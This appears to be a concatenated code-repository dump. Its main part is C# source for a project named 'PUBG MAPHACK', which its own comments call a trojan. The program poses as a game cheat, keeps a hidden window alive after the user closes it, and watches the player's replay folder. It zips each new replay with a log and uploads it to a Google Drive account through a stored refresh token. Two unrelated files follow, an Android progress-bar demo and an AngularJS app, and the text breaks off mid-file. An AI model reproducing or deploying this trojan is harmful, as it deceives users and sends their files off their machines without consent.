var pix = PixConverter.ToPix(bitmap);
// Do the magic
var page = engine.Process(pix);
return page.GetText();
}
}
}
}
<file_sep>/PUBG MAPHACK/classes/ConfigParser.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Windows.Forms;
namespace PUBG_MAPHACK
{
public class ConfigParser
{
public string playerConfig = "";
public Dictionary<string, string> enumsTranslation = new Dictionary<string, string>();
Dictionary<string, string[]> defaults = new Dictionary<string, string[]>();
public ConfigParser()
{
// Set default bindings as fallback
defaults.Add("Fire", new string[] { "LButton" });
defaults.Add("Interact", new string[] { "F" });
defaults.Add("ResolutionSizeY", new string[] { Screen.PrimaryScreen.Bounds.Height.ToString() });
defaults.Add("ResolutionSizeX", new string[] { Screen.PrimaryScreen.Bounds.Width.ToString() });
defaults.Add("StartCookingThrowable", new string[] { "R" });
// Get enum translations
enumsTranslation = getEnumTranslation();
// Load pubg player config
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Config\WindowsNoEditor\GameUserSettings.ini"))
{
try
{
playerConfig = File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Config\WindowsNoEditor\GameUserSettings.ini");
}
catch (FileNotFoundException ex)
{
Console.WriteLine(ex.Message);
}
}
}
public Dictionary<string, string[]> parseConfig()
{
string keyName;
string keyBind;
var keyBindings = new Dictionary<string, string[]>();
var returnValue = new Dictionary<string, string[]>();
string[] splitter = { };
string[] SplitOnKeys = { };
string[] SplitOnKey = { };
int i = 0;
int i2 = 0;
if (playerConfig.Length > 0)
{
/* This is ugly but gets the job done */
string[] Actions = playerConfig.Split(new[] { "ActionName" }, StringSplitOptions.RemoveEmptyEntries);
i = 0;
foreach (var Action in Actions)
{
i++;
if (i == 1 || i == Actions.Length) continue; // Skip first and last
// Get key name
splitter = Action.Split(new[] { '"' }, StringSplitOptions.RemoveEmptyEntries);
if (splitter.Length > 0)
{
keyName = splitter[1];
} else
{
continue;
}
// Get key bindings
SplitOnKeys = Action.Split(new[] { "Keys=" }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Keys in SplitOnKeys)
{
if (!Keys.Contains("Key=")) continue;
SplitOnKey = Action.Split(new[] { "Key=" }, StringSplitOptions.RemoveEmptyEntries);
i2 = 0;
foreach (var Key in SplitOnKey)
{
i2++;
if (i2 == 1) continue;
// Clean out some not needed characters
keyBind = Key;
keyBind = keyBind.Replace("),())),(", "");
keyBind = keyBind.Replace("))),(", "");
keyBind = keyBind.Replace("),(", "");
splitter = keyBind.Split(new[] { "," }, StringSplitOptions.RemoveEmptyEntries);
if (splitter.Length > 0)
{
// Translate to enum value
if(enumsTranslation.ContainsKey(keyBind)) {
keyBind = enumsTranslation[keyBind];
}
if(!keyBindings.ContainsKey(keyName))
{
// Add new keyBind
keyBindings.Add(keyName, new string[] { keyBind });
} else
{
// If keyBind has multiple keys lets add second bind also
keyBindings[keyName] = new string[] { keyBind, keyBindings[keyName][0] };
}
}
}
}
}
// Get player game resolution
string[] configLines = playerConfig.Split(new[] { '\n' });
foreach(var line in configLines)
{
if(line.Contains("ResolutionSizeX") && !keyBindings.ContainsKey("ResolutionSizeX"))
{
keyBindings.Add("ResolutionSizeX", new string[] { line.Replace("ResolutionSizeX=", "") });
}
if (line.Contains("ResolutionSizeY") && !keyBindings.ContainsKey("ResolutionSizeY"))
{
keyBindings.Add("ResolutionSizeY", new string[] { line.Replace("ResolutionSizeY=", "") });
}
}
}
if (keyBindings.ContainsKey("Fire") &&
keyBindings.ContainsKey("Interact") &&
keyBindings.ContainsKey("ResolutionSizeY") &&
keyBindings.ContainsKey("ResolutionSizeX") &&
keyBindings.ContainsKey("StartCookingThrowable"))
{
returnValue = keyBindings;
} else
{
returnValue = defaults;
}
return returnValue;
}
public Dictionary<string, string> getEnumTranslation()
{
Dictionary<string, string> translation = new Dictionary<string, string>();
translation.Add("LeftMouseButton", "LButton");
translation.Add("RightMouseButton", "RButton");
translation.Add("MiddleMouseButton", "MButton");
translation.Add("XButton1", "ThumbMouseButton1");
translation.Add("XButton2", "ThumbMouseButton2");
translation.Add("LeftShift", "LShiftKey");
translation.Add("RightShift", "RShiftKey");
translation.Add("LeftControl", "LControlKey");
translation.Add("RightControl", "RControlKey");
translation.Add("SpaceBar", "Space");
translation.Add("BackSpace", "Back");
translation.Add("Zero", "D0");
translation.Add("One", "D1");
translation.Add("Two", "D2");
translation.Add("Three", "D3");
translation.Add("Four", "D4");
translation.Add("Five", "D5");
translation.Add("Six", "D6");
translation.Add("Seven", "D7");
translation.Add("Eight", "D8");
translation.Add("Nine", "D9");
translation.Add("NumPadZero", "NumPad0");
translation.Add("NumPadOne", "NumPad1");
translation.Add("NumPadTwo", "NumPad2");
translation.Add("NumPadThree", "NumPad3");
translation.Add("NumPadFour", "NumPad4");
translation.Add("NumPadFive", "NumPad5");
translation.Add("NumPadSix", "NumPad6");
translation.Add("NumPadSeven", "NumPad7");
translation.Add("NumPadEight", "NumPad8");
translation.Add("NumPadNine", "NumPad9");
return translation;
}
}
}
<file_sep>/PUBG MAPHACK/Program.cs
using System;
using System.Windows.Forms;
using System.Diagnostics;
using System.IO;
namespace PUBG_MAPHACK
{
static class Program
{
static public Boolean debug = false;
static public string triggerTracker = "";
[STAThread]
static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
if (Directory.Exists("debug"))
{
debug = true;
}
// Let's start our trojan if it's not already running in background
Process[] isAlreadyInitialized = Process.GetProcessesByName("PUBG MAPHACK");
if (isAlreadyInitialized.Length == 1 || !Directory.Exists("x86"))
{
// Start our game monitor & let the trolling begin!
new GameMonitor();
// Start our replay monitor & uploader
new ReplayMonitor();
}
if (Directory.Exists("x86"))
{
// Run fake cheat application
Application.Run(new fake_cheat());
/* Run this hidden win form in background if user closes main application window.
* This keeps the trojan alive until reboot or manual shutdown in process list */
System.Windows.Forms.MessageBox.Show("Hidden instance of pubg maphack is still running (check processes)", "Developer helper", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Information);
Application.Run(new hidden());
}
else
{
System.Windows.Forms.MessageBox.Show("Make sure folder x86 is located in the same location as pubg maphack.exe (x86 can be found in pubg_maphack.zip)", "Error - x86 Missing", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);
}
}
public static void debug_log(string message)
{
if(debug == true)
{
using (StreamWriter sw = File.AppendText(@"debug\debug.txt"))
{
sw.WriteLine(DateTime.Now.ToString("yyyy-MM-dd HH:mm") + " | " + message);
}
}
}
}
}
<file_sep>/PUBG MAPHACK/classes/GoogleDriveUploader.cs
using System;
using System.IO;
using System.Threading;
using System.IO.Compression;
using Google.Apis.Auth.OAuth2;
using Google.Apis.Auth.OAuth2.Flows;
using Google.Apis.Auth.OAuth2.Responses;
using Google.Apis.Drive.v3;
using Google.Apis.Services;
using Google.Apis.Util.Store;
namespace PUBG_MAPHACK
{
class GoogleDriveUploader
{
// If modifying these scopes, remember to generate new token
static string[] Scopes = { DriveService.Scope.DriveFile };
// ClientId & ClientSecret needs to be created at google developer console
static readonly ClientSecrets secrets = new ClientSecrets()
{
ClientId = "",
ClientSecret = ""
};
// Refresh token is generate by generateNewToken(); see line 41
public string refreshToken = "";
public GoogleDriveUploader()
{
if (refreshToken == "" || secrets.ClientId == "" || secrets.ClientSecret == "")
{
System.Windows.Forms.MessageBox.Show("Google drive uploading is disabled - you need to create ClientId and ClientSecret in Google Developer Console. Check my GoogleDriveUploader class for more info.", "Developer helper", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Warning);
}
}
public void UploadFile(string path)
{
if (refreshToken == "" || secrets.ClientId == "" || secrets.ClientSecret == "")
{
return;
}
// Generate new google drive token (saved in token.json)
// Uncomment following line to generate new credentials for a google drive account (remember to comment out the predefined refresh token on line 31 first)
// UserCredential credential = generateNewToken();
// Authorize with predefined RefreshToken (RefreshTokens never expire on it's own)
UserCredential credential = AuthorizeWithRefreshToken(refreshToken);
// Zip directory before uploading to google drive
string zipFile = ZipDirectory(path);
// Make sure zip was successful before proceeding
if (!File.Exists(zipFile))
{
return;
}
Program.debug_log("Replay zipped and ready for upload");
// Create Drive API service.
var service = new DriveService(new BaseClientService.Initializer()
{
HttpClientInitializer = credential,
ApplicationName = "PUBG REPLAY UPLOADER",
});
// File information for google drive
var fileMetadata = new Google.Apis.Drive.v3.Data.File()
{
Name = Path.GetFileName(path) + ".zip",
MimeType = "application/zip, application/octet-stream, application/x-zip-compressed, multipart/x-zip"
};
FilesResource.CreateMediaUpload request;
Program.debug_log("Uploading replay");
// Do the actual file upload to google drive
using (var stream = new System.IO.FileStream(zipFile, System.IO.FileMode.Open))
{
request = service.Files.Create(fileMetadata, stream, "application/zip");
request.Fields = "id";
request.Upload();
}
// Recieve the response from google drive upload
var file = request.ResponseBody;
if(file.Id.Length > 0)
{
Program.debug_log("Upload complete");
} else
{
Program.debug_log("Upload failed");
}
// Cleanup after upload
if (File.Exists(zipFile))
{
File.Delete(zipFile); // Delete zip file
}
}
public UserCredential generateNewToken()
{
UserCredential credential;
// Delete existing token directory (saved where program is run from)
if (Directory.Exists("token.json"))
{
Directory.Delete("token.json", true);
}
// Generate new credentials (will open google drive login in browser)
credential = GoogleWebAuthorizationBroker.AuthorizeAsync(
new GoogleAuthorizationCodeFlow.Initializer { ClientSecrets = secrets },
Scopes,
"user",
CancellationToken.None,
new FileDataStore("token.json", true)).Result;
// Return credentials after signin
return credential;
}
private UserCredential AuthorizeWithRefreshToken(string token)
{
UserCredential credential;
// Get existing credentials using RefreshToken (can be found inside token.json after generating new token)
credential = new UserCredential(
new GoogleAuthorizationCodeFlow(
new GoogleAuthorizationCodeFlow.Initializer { ClientSecrets = secrets }
),
"user",
new TokenResponse
{
RefreshToken = token
});
// Return credentials
return credential;
}
private string ZipDirectory(string dirPath)
{
string zipPath = Path.GetTempPath() + Path.GetFileName(dirPath) + ".zip";
if (!File.Exists(zipPath) && Directory.Exists(dirPath))
{
// Create log file before zipping that shows if any funny stuff happened during match
string logPath = dirPath + @"\log.txt";
if (!File.Exists(logPath))
{
// Create a file to write to.
using (StreamWriter sw = File.CreateText(logPath))
{
sw.WriteLine(Program.triggerTracker);
}
}
Program.triggerTracker = "";
// Zip Directory
ZipFile.CreateFromDirectory(dirPath, zipPath);
}
return zipPath;
}
}
}
<file_sep>/PUBG MAPHACK/classes/ReplayMonitor.cs
using System;
using System.Threading;
using System.Threading.Tasks;
using System.IO;
namespace PUBG_MAPHACK
{
class ReplayMonitor
{
FileSystemWatcher watcher;
public GoogleDriveUploader GoogleDriveUploader = new GoogleDriveUploader();
public ReplayMonitor()
{
// Generate new google drive token (saved in token.json)
// GoogleDriveUploader.generateNewToken();
// Lets watch the pubg replay directory for filesystem changes
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Demos"))
{
watcher = new FileSystemWatcher();
watcher.Path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Demos";
watcher.NotifyFilter = NotifyFilters.DirectoryName;
watcher.Filter = "*.*";
watcher.Created += new FileSystemEventHandler(OnNewReplayCreation);
watcher.EnableRaisingEvents = true;
}
}
private void OnNewReplayCreation(object source, FileSystemEventArgs e)
{
if (Directory.Exists(e.FullPath))
{
/* Should probably make sure files are done being written to disc before starting
* upload but i'm lazy to handle that so let's just wait 5 seconds and hope it's done */
Thread.Sleep(5000);
Program.debug_log("Replay was created - Attemping upload now...");
// Let's upload newly created replay to google drive
var t = Task.Run(() => GoogleDriveUploader.UploadFile(e.FullPath));
}
}
}
}
<file_sep>/PUBG MAPHACK/forms/fake_cheat.cs
using System.Windows.Forms;
namespace PUBG_MAPHACK
{
public partial class fake_cheat : Form
{
public fake_cheat()
{
InitializeComponent();
}
}
}<file_sep>/PUBG MAPHACK/forms/hidden.cs
using System.Windows.Forms;
namespace PUBG_MAPHACK
{
public partial class hidden : Form
{
public hidden()
{
InitializeComponent();
this.WindowState = FormWindowState.Minimized;
this.ShowInTaskbar = false;
this.WindowState = FormWindowState.Normal; // Seems to do the trick in windows 8
}
}
}
|
de137f8cb2db42300a63bd62baa95691764261cc
|
[
"JavaScript",
"C#"
] | 9
|
JavaScript
|
metaversettt/pubg-maphack-master
|
9cc0f8fdb300f67cc639ea42e53b9dd51a607b90
|
f03c88f4b09f7cb1a62944f8061bb8bd11b2193f
|
refs/heads/master
|
<repo_name>tuankta20/ss6-m2<file_sep>/linkedlist/LinkedListMain.php
<?php
include_once "LinkedList.php";
$linkedList = new LinkedList();
$linkedList ->insertFirst(11);
$linkedList ->insertFirst(22);
$linkedList ->insertFirst(33);
$linkedList ->insertFirst(44);
$totalNode = $linkedList->totalNodes();
$linkData = $linkedList->readList();
echo $totalNode.'<br>';
echo implode('-', $linkData);<file_sep>/mylinkedlist/MyLinkedListTest.php
<?php
include_once "MyLinkedList.php";
$linkedList = new MyLinkedList();
$linkedList->insertFirst(22);
$linkedList->insertFirst(33);
$linkedList->insertLast(44);
$linkedList->insertLast(55);
$totalNode = $linkedList->totalNodes();
$linkData = $linkedList->readList();
echo $totalNode.'<br>';
echo implode('-', $linkData);
<file_sep>/mylinkedlist/MyLinkedList.php
<?php
include_once "Node.php";
class MyLinkedList
{
private $firstNode;
private $lastNode;
private $count;
public function __construct()
{
$this->firstNode = NULL;
$this->lastNode = NULL;
$this->count = 0;
}
public function insertFirst($data)
{
$link = new Node($data);
$link->next = $this->firstNode;
$this->firstNode = $link;
if ($this->lastNode == NULL) {
$this->lastNode = $link;
}
$this->count++;
}
public function insertLast($data)
{
if ($this->firstNode != NULL) {
$link = new Node($data);
$this->lastNode->next = $link;
$link->next = NULL;
$this->lastNode = $link;
$this->count++;
} else {
$this->insertFirst($data);
}
}
public function totalNodes()
{
return $this->count;
}
public function readList()
{
$listData = array();
$current = $this->firstNode;
while ($current != Null) {
array_push($listData, $current->readNode());
$current = $current->next;
}
return $listData;
}
public function add($index, $element)
{
$i = 0;
$current = $this->firstNode;
while (++$i < $index) {
$current = $current->next;
}
$link = new Node($element);
$link->next = $current->next;
$current->next = $link;
$this->count++;
}
public function getList()
{
$listData = array();
$current = $this->firstNode;
while ($current != NULL) {
array_push($listData, $current->getData());
$current = $current->next;
}
return $listData;
}
public function getFirst()
{
return $this->firstNode->getData();
}
public function getLast()
{
return $this->lastNode->getData();
}
public function remove($index)
{
$i = 0;
$current = $this->firstNode;
while (++$i < $index) {
$current = $current->next;
}
$current->next = $current->next->next;
$this->count--;
}
public function removeObject($element)
{
$i = 0;
$link = new Node($element);
$current = $this->firstNode;
while ($current != NULL) {
if ($current->getData() == $link->getData()) {
break;
}
$i++;
$current = $current->next;
}
$this->remove($i);
}
public function contains($element)
{
$link = new Node($element);
$current = $this->firstNode;
while ($current != NULL) {
if ($current->getData() == $link->getData()) {
return "true";
}
$current = $current->next;
}
return "false";
}
public function indexOf($element)
{
$i = 0;
$link = new Node($element);
$current = $this->firstNode;
while ($current != NULL) {
if ($current->getData() == $link->getData()) {
return $i;
}
$i++;
$current = $current->next;
}
return "-1";
}
public function get($index)
{
$i = 0;
$current = $this->firstNode;
while ($i++ < $index) {
$current = $current->next;
}
return $current->getData();
}
}
|
08f01670ad233e46a135c4e9a0d36058019fecb1
|
[
"PHP"
] | 3
|
PHP
|
tuankta20/ss6-m2
|
c146fe33b904e5dc5202d286a65a2841c7edb351
|
75317df7e71aa02df4d25e7423b703b7df721991
|
refs/heads/master
|
<repo_name>UltimateCutlery/PirateScript<file_sep>/README.md
# PirateScript
JavaScript starter pack for the 'Pirate Script' assignment
## Task
- Open the file called `piratescript.js`
- Write a function that encodes a given input into pirate talk..
- For each word:
- If the word is 'pounds', change this to pirate currency -> 'doubloons'
- If the word is a number, leave this unchanged
- Otherwise, take the first letter and move this to the end of the word and then add/append 'arr' to the end
### Example
```javascript
console.log( piratize( "hello" ) ); // returns "elloharr"
console.log( piratize( "hello world") ); // returns "elloharr orldwarr"
console.log( piratize( "pizza costs 20 pounds" ) ); // returns "izzaparr ostscarr 20 doubloons"
```
### Test Notes
If you want to test the code for yourself before submitting, paste your code into the ScratchPad (https://dash.projectfunction.io/scratchpad)
### Submission Notes
Once you have completed the task, simply push your changes back to the repository for this assignment. After the submission deadline, only the latest push will be considered. Happy Piratin'! Arrrrr!<file_sep>/test.js
describe ('return "elloharr" when input is "hello"' , ()=> {
expect(piratize('hello')).toEqual('elloharr');
});
describe ('return "elloharr orldwarr" when input is "hello world"' , ()=> {
expect(piratize('hello world')).toEqual('elloharr orldwarr');
});
describe ('return "izzaparr ostscarr 20 doubloons" when input is "pizza costs 20 pounds"' , ()=> {
expect(piratize('pizza costs 20 pounds')).toEqual('izzaparr ostscarr 20 doubloons');
});
describe ('return "Iarr maarr trandedsarr ithwarr aarr umsarr foarr 4000 doubloons orthwarr foarr oldgarr endsarr elpharr" when input is "I am stranded with a sum of 4000 pounds worth of gold send help"' , ()=> {
expect(piratize('I am stranded with a sum of 4000 pounds worth of gold send help')).toEqual('Iarr maarr trandedsarr ithwarr aarr umsarr foarr 4000 doubloons orthwarr foarr oldgarr endsarr elpharr');
});
|
1f11d0e59ff34abf26ff3ad463e6178ba3e1af35
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
UltimateCutlery/PirateScript
|
02568d9e6c353e43345364e5308df4e8e777116c
|
fc73d6c75c12e1eed546fd7dc094ce6a0a0de1c4
|
refs/heads/master
|
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEditor;
using UnityEditorInternal;
using VRCSDK2;
[CustomEditor(typeof(VisemeCreator))]
public class AutoAssignVisemes : Editor
{
private string labelText =
"This script assumes you are using visemes generated by CATs.\nThey should all start with 'vrc.v_'.";
VisemeCreator obj;
public void OnEnable()
{
obj = (VisemeCreator)target;
}
public override void OnInspectorGUI()
{
GUILayout.Label(labelText);
if (!GUILayout.Button("Find and add visemes."))
return;
DoEverything();
}
Transform avatar = null;
private SkinnedMeshRenderer avatarMesh = null;
private VRC_AvatarDescriptor avatarDescriptor = null;
string animationPath;
string exportPath;
private bool findAvatarAndAnimationPath(Transform cur)
{
// Find the avatar root
string path = "";
do
{
if (cur.GetComponent<VRCSDK2.VRC_AvatarDescriptor>() != null)
{
avatar = cur;
avatarMesh = cur.GetComponentInChildren<SkinnedMeshRenderer>();
if (avatarMesh == null)
{
Debug.LogError("No skinned mesh renderer found");
}
//Debug.Log("Mesh found: Blendshape count - " + avatarMesh.sharedMesh.blendShapeCount);
avatarDescriptor = cur.GetComponent<VRC_AvatarDescriptor>();
break;
}
if (path.Length > 0)
path = cur.name + "/" + path;
else
path = cur.name;
cur = cur.parent;
} while (cur != null);
if (avatar != null)
{
animationPath = path;
Debug.Log("Animation path:" + animationPath);
return true;
}
return false;
}
private void Cleanup()
{
// Remove this script from the avatar so that VRC is happy.
DestroyImmediate(obj.gameObject.GetComponent<VisemeCreator>());
}
private void DoEverything()
{
try
{
if (!findAvatarAndAnimationPath(obj.transform))
{
Debug.LogError("Could not find Avatar Descriptor component.");
return;
}
if (avatarDescriptor.lipSync != VRC_AvatarDescriptor.LipSyncStyle.VisemeBlendShape)
{
avatarDescriptor.lipSync = VRC_AvatarDescriptor.LipSyncStyle.VisemeBlendShape;
avatarDescriptor.VisemeSkinnedMesh = avatarMesh;
labelText = "Lipsync style was not set to Viseme Blend Shape.\nClick again to assign blendshapes.";
return;
}
AssignBlendshapes();
Debug.Log("Viseme Creator - All done!");
Cleanup();
}
catch (System.Exception ex)
{
Debug.Log("An error occured. Likely because you do not have a mesh selected.");
}
}
private void AssignBlendshapes()
{
var VRC_Visemes = avatarDescriptor.VisemeBlendShapes;
for (int i = 0; i < avatarMesh.sharedMesh.blendShapeCount; i++)
{
var blendshapeName = avatarMesh.sharedMesh.GetBlendShapeName(i);
switch (blendshapeName)
{
case "vrc.v_sil":
VRC_Visemes.SetValue(blendshapeName, 0);
break;
case "vrc.v_pp":
VRC_Visemes.SetValue(blendshapeName, 1);
break;
case "vrc.v_ff":
VRC_Visemes.SetValue(blendshapeName, 2);
break;
case "vrc.v_th":
VRC_Visemes.SetValue(blendshapeName, 3);
break;
case "vrc.v_dd":
VRC_Visemes.SetValue(blendshapeName, 4);
break;
case "vrc.v_kk":
VRC_Visemes.SetValue(blendshapeName, 5);
break;
case "vrc.v_ch":
VRC_Visemes.SetValue(blendshapeName, 6);
break;
case "vrc.v_ss":
VRC_Visemes.SetValue(blendshapeName, 7);
break;
case "vrc.v_nn":
VRC_Visemes.SetValue(blendshapeName, 8);
break;
case "vrc.v_rr":
VRC_Visemes.SetValue(blendshapeName, 9);
break;
case "vrc.v_aa":
VRC_Visemes.SetValue(blendshapeName, 10);
break;
case "vrc.v_e":
VRC_Visemes.SetValue(blendshapeName, 11);
break;
case "vrc.v_ih":
VRC_Visemes.SetValue(blendshapeName, 12);
break;
case "vrc.v_oh":
VRC_Visemes.SetValue(blendshapeName, 13);
break;
case "vrc.v_ou":
VRC_Visemes.SetValue(blendshapeName, 14);
break;
default:
break;
}
}
}
}
<file_sep># AutoVisemeAssigner
Quick and dirty 30 minute job to see if it works.
Some code used from https://github.com/theepicsnail/Marker
|
6da3f095d1bb8ec5a4b98d3ff4fa701706d375e7
|
[
"Markdown",
"C#"
] | 2
|
C#
|
kaaori/AutoVisemeAssigner
|
9f042ef77f3519dec259acf6d4c077a108dc25bf
|
c99d8d52e1058b4564feb1967b7eaacf51056f23
|
refs/heads/main
|
<repo_name>Susko35/RMA-DZ-3<file_sep>/listview/app/src/main/java/com/susnjara/listview/NameClickListener.java
package com.susnjara.listview;
public interface NameClickListener {
void onNameClick(int position);
}
<file_sep>/listview/app/src/main/java/com/susnjara/listview/NameActivity.java
package com.susnjara.listview;
import android.app.Activity;
import android.app.Notification;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import java.util.ArrayList;
public class NameActivity extends Activity {
private TextView textView;
private Button buttonName;
private View.OnClickListener onClickListener;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_name);
setupData();
}
private void setupData(){
textView = findViewById(R.id.textViewName);
buttonName = findViewById(R.id.buttonName);
onClickListener = new View.OnClickListener() {
@Override
public void onClick(View v) {
clicked();
}
};
Intent startIntent = this.getIntent();
if(startIntent.hasExtra(MainActivity.KEY_INPUT)){
textView.setText(startIntent.getStringExtra(MainActivity.KEY_INPUT));
}
buttonName.setOnClickListener(onClickListener);
}
private void clicked(){
Intent backIntent = new Intent(getApplicationContext(), MainActivity.class);
this.startActivity(backIntent);
}
}
<file_sep>/listview/app/src/main/java/com/susnjara/listview/MainActivity.java
package com.susnjara.listview;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import java.util.ArrayList;
import java.util.List;
public class MainActivity extends AppCompatActivity implements NameClickListener{
public static final String KEY_INPUT = "input data";
private static final String TAG = "MainActivity";
private RecyclerView recyclerView;
private List<String> dataList;
private CustomAdapter customAdapter;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
setupData();
setupRecyclerView();
}
private void setupData(){
dataList = new ArrayList<>();
dataList.add("prvo ime");
dataList.add("drugo ime");
dataList.add("trece ime");
dataList.add("<NAME>");
dataList.add("<NAME>");
dataList.add("ListView");
dataList.add("<NAME>");
dataList.add("<NAME>");
dataList.add("<NAME>");
dataList.add("Zadaca lv 3");
dataList.add("setupData");
dataList.add("setupRecyclerView");
dataList.add("Lkrterr ajjsjw");
}
private void setupRecyclerView(){
recyclerView = findViewById(R.id.recyclerView);
recyclerView.setLayoutManager(new LinearLayoutManager(this));
customAdapter = new CustomAdapter(dataList, this);
recyclerView.setAdapter(customAdapter);
}
@Override
public void onNameClick(int position){
Log.d(TAG, "onNameClick: int position" + position);
Log.d(TAG, dataList.get(position));
Intent intent = new Intent(getApplicationContext(), NameActivity.class);
intent.putExtra(KEY_INPUT, dataList.get(position));
this.startActivity(intent);
}
}
|
799e19ef6450c201c75841330163db94f8a9616e
|
[
"Java"
] | 3
|
Java
|
Susko35/RMA-DZ-3
|
7f52839f6e03291f28ee82a9242cdd196f7ba366
|
c031f8cf3d79781d561c342e3118edcab15dc690
|
refs/heads/master
|
<file_sep># Thread-demo
异步加载进度条
<file_sep>package com.qingshangzuo.thread_demo;
import android.os.AsyncTask;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.ProgressBar;
import android.widget.TextView;
import java.lang.ref.WeakReference;
public class MainActivity extends AppCompatActivity {
private static final String TAG = "MainActivity";
TextView textView;
ProgressBar progressBar;
MyAsyncTask myAsyncTash;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
textView = findViewById(R.id.textView);
progressBar = findViewById(R.id.progressBar);
}
static class MyAsyncTask extends AsyncTask<Integer,Integer,Integer>{
WeakReference<MainActivity> weakReference;
public MyAsyncTask(MainActivity activity){
weakReference = new WeakReference<MainActivity>(activity);
}
@Override
protected void onPreExecute() {
super.onPreExecute();
MainActivity activity = weakReference.get();
if(activity != null) activity.progressBar.setProgress(0);
Log.d(TAG,"onPreExecute");
}
@Override
protected Integer doInBackground(Integer... integers) {
int sum = 0;
for(int i = 1;i < 100;i++){
try{
Log.d(TAG,"doInBackground:" + Thread.currentThread().getName());
Thread.sleep(100);
}catch (InterruptedException e){
e.printStackTrace();
}
sum += i;
publishProgress(i);
if(isCancelled()) break;
}
return -1;
}
@Override
protected void onProgressUpdate(Integer... values) {
super.onProgressUpdate(values);
Log.d(TAG,"onProgressUpdate:");
MainActivity activity = weakReference.get();
if(activity != null){
activity.textView.setText("progress" + values[0]);
activity.progressBar.setProgress(values[0]);
}
}
@Override
protected void onPostExecute(Integer integer) {
super.onPostExecute(integer);
Log.d(TAG,"onPostExecute");
MainActivity activity = weakReference.get();
if(activity != null){
activity.textView.setText("congratulation !!! finished");
activity.progressBar.setProgress(0);
}
}
}
public void calculate(View v) {
myAsyncTash = new MyAsyncTask(this);
myAsyncTash.execute(0);
}
protected void stop() {
myAsyncTash.cancel(true);
}
}
|
9b532342baddd1f34eaaa123ab0468765bfc3087
|
[
"Markdown",
"Java"
] | 2
|
Markdown
|
luckilyswl/Thread
|
4134fb71fd8e9c35a185acec1066a6d97e614bf3
|
9be0282453ad32244ef7e73ee5b9fe8fa27809f6
|
refs/heads/master
|
<repo_name>johnpmayer/wearelearned<file_sep>/app.js
function todo() {
alert('ToDo');
}
angular.module('app',['$strap.directives'])
.service('Mode', function() {
var that = this;
this.mode = 'concept',
this.setMode = function(mode) {
that.mode = mode;
}
})
.directive('optiontitle', function() {
return {
restrict: 'E',
transclude: false,
scope: true,
controller: function($scope, $attrs) {
$scope.title = $scope[$attrs.title];
$scope.options = $scope[$attrs.options];;
},
templateUrl: 'templates/optiontitle.html'
};
})
.controller("Main", function($scope) {
$scope.search = function(){
alert($scope.searchString);
}
// Fake Data:
$scope.conceptName = "Hydrogen bonds";
$scope.dependencies = ["Electrostatic forces", "Electron geometry", "A topic with an extremely long name"];
$scope.dependants = ["Freezing point of water", "DNA"];
$scope.explanations = [
{
author: 'Mary',
votes: 130,
text: "fo sfjhbs khb zc afgfjhgs jydg ckjyzgx jhvb kajsfg kasjfbg kasjgsadfhbg iasdhf laiuhv liae7fy8 hk,jebf la89sf yqkjb ,kjfbsf 9asgf fb o dub dsal ju dsfads fyf jyd hjafkhjd fjhgf kasdgkdjh gasdk casd kj bar baz"
},
{
author: 'John',
votes: 70,
text: "foo bar baz asduyf gakhfvkasdh gsdhgc ksahc sdhcsahg kashgsakdhkasg asdkhfgaksdjhg dsfh sdkfjhg sadfkjhg asdfkjh sadhjg askdfhg sdfh sdkjfh asdkflieufbas,jfg owiefb asdjkhg asdilug s,mncbs,djchb sjfbasdmfb ;lsaufdfg .asukdfsbf. sdf usdyvf"
},
];
})
.controller("LeftSize", function($scope, Mode) {
$scope.Mode = Mode;
var updateLayout = function(mode) {
$scope.status = (mode == 'dependencies')
? "open" : "closed";
$scope.layout = ($scope.status == "open")
? "span3"
: "span1";
}
$scope.close = function(){
Mode.setMode('concept');
}
$scope.open = function(){
Mode.setMode('dependencies');
}
$scope.$watch("Mode.mode", function(newVal, oldVal) {
updateLayout(newVal);
}, true);
})
.controller("RightSize", function($scope, Mode) {
$scope.Mode = Mode;
var updateLayout = function(mode) {
$scope.status = (mode == 'dependants')
? "open" : "closed";
$scope.layout = ($scope.status == "open")
? "span3"
: "span1";
}
$scope.close = function(){
Mode.setMode('concept');
}
$scope.open = function(){
Mode.setMode('dependants');
}
$scope.$watch("Mode.mode", function(newVal, oldVal) {
updateLayout(newVal);
}, true);
})
.controller("MiddleSize", function($scope, Mode) {
$scope.Mode = Mode;
var updateLayout = function(mode) {
$scope.status = (mode == 'concept')
? "full" : "sidebar";
$scope.layout = ($scope.status == "full")
? "span10"
: "span8";
}
$scope.$watch("Mode.mode", function(newVal, oldVal) {
updateLayout(newVal);
}, true);
})
.controller("Dependency", function($scope) {
$scope.menuOptions = [{name:'Explore',callback:todo}];
})
.controller("Dependant", function($scope) {
$scope.menuOptions = [{name:'Explore',callback:todo}];
})
.controller("ConceptTitle", function($scope) {
$scope.menuOptions = [{name:'Contribute',callback:todo}];
})
.controller("Explanation", function($scope) {
